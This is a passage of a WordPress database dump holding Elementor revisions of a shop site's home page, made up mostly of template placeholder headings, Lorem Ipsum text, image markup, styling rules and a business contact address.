https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 12:26:09','2022-09-30 06:56:09','',1373,'https://gopalak.in/?p=1502',0,'revision','',0),(1503,1,'2022-09-30 12:26:09','2022-09-30 06:56:09','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-accordion{text-align:left}.elementor-accordion .elementor-accordion-item{border:1px solid #d4d4d4}.elementor-accordion .elementor-accordion-item+.elementor-accordion-item{border-top:none}.elementor-accordion .elementor-tab-title{margin:0;padding:15px 20px;font-weight:700;line-height:1;cursor:pointer;outline:none}.elementor-accordion .elementor-tab-title .elementor-accordion-icon{display:inline-block;width:1.5em}.elementor-accordion .elementor-tab-title .elementor-accordion-icon svg{width:1em;height:1em}.elementor-accordion .elementor-tab-title .elementor-accordion-icon.elementor-accordion-icon-right{float:right;text-align:right}.elementor-accordion .elementor-tab-title .elementor-accordion-icon.elementor-accordion-icon-left{float:left;text-align:left}.elementor-accordion .elementor-tab-title .elementor-accordion-icon .elementor-accordion-icon-closed{display:block}.elementor-accordion .elementor-tab-title .elementor-accordion-icon .elementor-accordion-icon-opened,.elementor-accordion .elementor-tab-title.elementor-active .elementor-accordion-icon-closed{display:none}.elementor-accordion .elementor-tab-title.elementor-active .elementor-accordion-icon-opened{display:block}.elementor-accordion .elementor-tab-content{display:none;padding:15px 20px;border-top:1px solid #d4d4d4}@media (max-width:767px){.elementor-accordion .elementor-tab-title{padding:12px 15px}.elementor-accordion .elementor-tab-title .elementor-accordion-icon{width:1.2em}.elementor-accordion .elementor-tab-content{padding:7px 15px}}.e-container>.elementor-widget-accordion{width:var(--container-widget-width,100%)}</style>		\n												<a href=\"\">Accordion #1</a>\n					Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n												<a href=\"\">Accordion #2</a>\n					Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n												<a href=\"\">Accordion Title</a>\n					Accordion Content\n												<a href=\"\">Accordion Title</a>\n					Accordion Content\n			<h2>Add Your Heading Text Here</h2>		\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-divider{--divider-border-style:none;--divider-border-width:1px;--divider-color:#2c2c2c;--divider-icon-size:20px;--divider-element-spacing:10px;--divider-pattern-height:24px;--divider-pattern-size:20px;--divider-pattern-url:none;--divider-pattern-repeat:repeat-x}.elementor-widget-divider .elementor-divider{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-divider .elementor-divider__text{font-size:15px;line-height:1;max-width:95%}.elementor-widget-divider .elementor-divider__element{margin:0 var(--divider-element-spacing);-ms-flex-negative:0;flex-shrink:0}.elementor-widget-divider .elementor-icon{font-size:var(--divider-icon-size)}.elementor-widget-divider .elementor-divider-separator{display:-webkit-box;display:-ms-flexbox;display:flex;margin:0;direction:ltr}.elementor-widget-divider--view-line_icon .elementor-divider-separator,.elementor-widget-divider--view-line_text .elementor-divider-separator{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-divider--view-line_icon .elementor-divider-separator:after,.elementor-widget-divider--view-line_icon .elementor-divider-separator:before,.elementor-widget-divider--view-line_text .elementor-divider-separator:after,.elementor-widget-divider--view-line_text .elementor-divider-separator:before{display:block;content:\"\";border-bottom:0;-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;border-top:var(--divider-border-width) var(--divider-border-style) var(--divider-color)}.elementor-widget-divider--element-align-left .elementor-divider .elementor-divider-separator>.elementor-divider__svg:first-of-type{-webkit-box-flex:0;-ms-flex-positive:0;flex-grow:0;-ms-flex-negative:100;flex-shrink:100}.elementor-widget-divider--element-align-left .elementor-divider-separator:before{content:none}.elementor-widget-divider--element-align-left .elementor-divider__element{margin-left:0}.elementor-widget-divider--element-align-right .elementor-divider .elementor-divider-separator>.elementor-divider__svg:last-of-type{-webkit-box-flex:0;-ms-flex-positive:0;flex-grow:0;-ms-flex-negative:100;flex-shrink:100}.elementor-widget-divider--element-align-right .elementor-divider-separator:after{content:none}.elementor-widget-divider--element-align-right .elementor-divider__element{margin-right:0}.elementor-widget-divider:not(.elementor-widget-divider--view-line_text):not(.elementor-widget-divider--view-line_icon) .elementor-divider-separator{border-top:var(--divider-border-width) var(--divider-border-style) var(--divider-color)}.elementor-widget-divider--separator-type-pattern{--divider-border-style:none}.elementor-widget-divider--separator-type-pattern.elementor-widget-divider--view-line .elementor-divider-separator,.elementor-widget-divider--separator-type-pattern:not(.elementor-widget-divider--view-line) .elementor-divider-separator:after,.elementor-widget-divider--separator-type-pattern:not(.elementor-widget-divider--view-line) .elementor-divider-separator:before,.elementor-widget-divider--separator-type-pattern:not([class*=elementor-widget-divider--view]) .elementor-divider-separator{width:100%;min-height:var(--divider-pattern-height);-webkit-mask-size:var(--divider-pattern-size) 100%;mask-size:var(--divider-pattern-size) 100%;-webkit-mask-repeat:var(--divider-pattern-repeat);mask-repeat:var(--divider-pattern-repeat);background-color:var(--divider-color);-webkit-mask-image:var(--divider-pattern-url);mask-image:var(--divider-pattern-url)}.elementor-widget-divider--no-spacing{--divider-pattern-size:auto}.elementor-widget-divider--bg-round{--divider-pattern-repeat:round}.rtl .elementor-widget-divider .elementor-divider__text{direction:rtl}.e-container>.elementor-widget-divider{width:var(--container-widget-width,100%);--flex-grow:var(--container-widget-flex-grow,0)}</style>		\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 12:26:09','2022-09-30 06:56:09','',1373,'https://gopalak.in/?p=1503',0,'revision','',0),(1504,1,'2022-09-30 12:26:40','2022-09-30 06:56:40','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-accordion{text-align:left}.elementor-accordion .elementor-accordion-item{border:1px solid #d4d4d4}.elementor-accordion .elementor-accordion-item+.elementor-accordion-item{border-top:none}.elementor-accordion .elementor-tab-title{margin:0;padding:15px 20px;font-weight:700;line-height:1;cursor:pointer;outline:none}.elementor-accordion .elementor-tab-title .elementor-accordion-icon{display:inline-block;width:1.5em}.elementor-accordion .elementor-tab-title .elementor-accordion-icon svg{width:1em;height:1em}.elementor-accordion .elementor-tab-title .elementor-accordion-icon.elementor-accordion-icon-right{float:right;text-align:right}.elementor-accordion .elementor-tab-title .elementor-accordion-icon.elementor-accordion-icon-left{float:left;text-align:left}.elementor-accordion .elementor-tab-title .elementor-accordion-icon .elementor-accordion-icon-closed{display:block}.elementor-accordion .elementor-tab-title .elementor-accordion-icon .elementor-accordion-icon-opened,.elementor-accordion .elementor-tab-title.elementor-active .elementor-accordion-icon-closed{display:none}.elementor-accordion .elementor-tab-title.elementor-active .elementor-accordion-icon-opened{display:block}.elementor-accordion .elementor-tab-content{display:none;padding:15px 20px;border-top:1px solid #d4d4d4}@media (max-width:767px){.elementor-accordion .elementor-tab-title{padding:12px 15px}.elementor-accordion .elementor-tab-title .elementor-accordion-icon{width:1.2em}.elementor-accordion .elementor-tab-content{padding:7px 15px}}.e-container>.elementor-widget-accordion{width:var(--container-widget-width,100%)}</style>		\n												<a href=\"\">Accordion #1</a>\n					Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n												<a href=\"\">Accordion #2</a>\n					Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n												<a href=\"\">Accordion Title</a>\n					Accordion Content\n												<a href=\"\">Accordion Title</a>\n					Accordion Content\n			<h2>Add Your Heading Text Here</h2>		\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-divider{--divider-border-style:none;--divider-border-width:1px;--divider-color:#2c2c2c;--divider-icon-size:20px;--divider-element-spacing:10px;--divider-pattern-height:24px;--divider-pattern-size:20px;--divider-pattern-url:none;--divider-pattern-repeat:repeat-x}.elementor-widget-divider .elementor-divider{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-divider .elementor-divider__text{font-size:15px;line-height:1;max-width:95%}.elementor-widget-divider .elementor-divider__element{margin:0 var(--divider-element-spacing);-ms-flex-negative:0;flex-shrink:0}.elementor-widget-divider .elementor-icon{font-size:var(--divider-icon-size)}.elementor-widget-divider .elementor-divider-separator{display:-webkit-box;display:-ms-flexbox;display:flex;margin:0;direction:ltr}.elementor-widget-divider--view-line_icon .elementor-divider-separator,.elementor-widget-divider--view-line_text .elementor-divider-separator{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-divider--view-line_icon .elementor-divider-separator:after,.elementor-widget-divider--view-line_icon .elementor-divider-separator:before,.elementor-widget-divider--view-line_text .elementor-divider-separator:after,.elementor-widget-divider--view-line_text .elementor-divider-separator:before{display:block;content:\"\";border-bottom:0;-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;border-top:var(--divider-border-width) var(--divider-border-style) var(--divider-color)}.elementor-widget-divider--element-align-left .elementor-divider .elementor-divider-separator>.elementor-divider__svg:first-of-type{-webkit-box-flex:0;-ms-flex-positive:0;flex-grow:0;-ms-flex-negative:100;flex-shrink:100}.elementor-widget-divider--element-align-left .elementor-divider-separator:before{content:none}.elementor-widget-divider--element-align-left .elementor-divider__element{margin-left:0}.elementor-widget-divider--element-align-right .elementor-divider .elementor-divider-separator>.elementor-divider__svg:last-of-type{-webkit-box-flex:0;-ms-flex-positive:0;flex-grow:0;-ms-flex-negative:100;flex-shrink:100}.elementor-widget-divider--element-align-right 